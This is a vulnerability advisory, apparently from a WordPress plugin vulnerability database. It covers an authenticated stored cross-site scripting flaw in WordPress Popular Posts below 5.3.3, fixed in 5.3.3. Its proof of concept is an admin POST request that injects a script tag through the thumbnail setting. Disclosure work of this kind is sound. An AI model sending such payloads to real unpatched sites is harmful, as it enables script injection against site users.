WordPress Plugin Vulnerabilities
WordPress Popular Posts < 5.3.3 - Authenticated Stored Cross-Site Scripting (XSS)
Description
The plugin did not properly sanitise or escape its Default Thumbnail setting before outputting back in the page, leading to a stored Cross-Site Scripting issue
Proof of Concept
POST /wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 181 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 upload_thumb_src=%22%3e%3cscript%3ealert(%2fXSS%2f)%3c%2fscript%3e&thumb_source=featured&thumb_lazy_load=1&thumb_field=&thumb_field_resize=0§ion=thumb&wpp-admin-token=69e258f2d7
Affects Plugins
Fixed in version 5.3.3
References
Classification
Miscellaneous
Original Researcher
Yu Iwama of Secure Sky Technology Inc.
Verified
Yes
Timeline
Publicly Published
2021-06-07 (about 1 years ago)
Added
2021-06-07 (about 1 years ago)
Last Updated
2022-01-17 (about 1 years ago)